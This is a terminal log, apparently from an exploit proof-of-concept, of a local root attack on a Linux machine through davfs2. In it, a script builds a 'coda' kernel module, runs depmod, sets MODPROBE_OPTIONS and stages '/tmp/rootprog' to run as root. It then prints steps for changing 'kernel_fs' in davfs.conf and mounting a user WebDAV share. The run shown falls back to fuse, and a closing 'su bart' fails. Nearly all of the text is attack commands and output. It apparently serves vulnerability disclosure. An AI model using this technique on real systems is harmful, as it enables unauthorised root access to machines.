davtest@humble:/tmp$ cat Makefilecat Makefileobj-m += coda.o all: make

1. davtest@humble:/tmp$ cat Makefile
2. cat Makefile
3. obj-m += coda.o
4.  
5. all:
6. make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
7.  
8. clean:
9. make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
10. davtest@humble:/tmp$ ./exploit.sh
11. ./exploit.sh
12. #######################################
13. Specify the full path of the kernel module which you want to load
14. Leave empty if you wish to compile it now
15. Understand that you need kernel headers, make and gcc for successful compilation
16. #######################################
17.  
18.  
19. make: Warning: File `Makefile' has modification time 3.4e+04 s in the future
20. make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
21. make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
22. make[4]: Warning: File `/tmp/Makefile' has modification time 3.4e+04 s in the future
23. CC [M] /tmp/coda.o
24. make[4]: warning: Clock skew detected. Your build may be incomplete.
25. Building modules, stage 2.
26. make[4]: Warning: File `/tmp/Makefile' has modification time 3.4e+04 s in the future
27. MODPOST 1 modules
28. CC /tmp/coda.mod.o
29. LD [M] /tmp/coda.ko
30. make[4]: warning: Clock skew detected. Your build may be incomplete.
31. make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
32. make: warning: Clock skew detected. Your build may be incomplete.
33. #######################################
34. Copying the modules in use for the running kernel in the local directory
35. #######################################
36. #######################################
37. Copying coda.ko module
38. #######################################
39. #######################################
40. Setting the 'modules.dep' and running depmod
41. #######################################
42. #######################################
43. Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
44. WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
45. #######################################
46.  
47.  
48. cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
49. #######################################
50. Setting MODPROBE_OPTIONS variable
51. #######################################
52. #######################################
53. Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
54. # General Options
55. # ---------------
56.  
57. # dav_user davfs2 # system wide config file only
58. # dav_group davfs2 # system wide config file only
59. # ignore_home # system wide config file only
60. kernel_fs coda
61. # buf_size 16 # KiByte
62. #######################################
63. #######################################
64. Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
65. https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
66. #######################################
67. #######################################
68. If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
69. #######################################
70. davtest@humble:/tmp$ mount /home/davtest/dav
71. mount /home/davtest/dav
72. Please enter the username to authenticate with server
73. http://127.0.0.1/webdav/ or hit enter for none.
74. Username: test
75. test
76. Please enter the password to authenticate user test with server
77. http://127.0.0.1/webdav/ or hit enter for none.
78. Password: test
79.  
80. /sbin/mount.davfs: no free coda device to mount
81. /sbin/mount.davfs: trying fuse kernel file system
82. /sbin/mount.davfs: fuse device opened successfully
83. davtest@humble:/tmp$ su bart
84. su bart
85. No passwd entry for user 'bart'
86. davtest@humble:/tmp$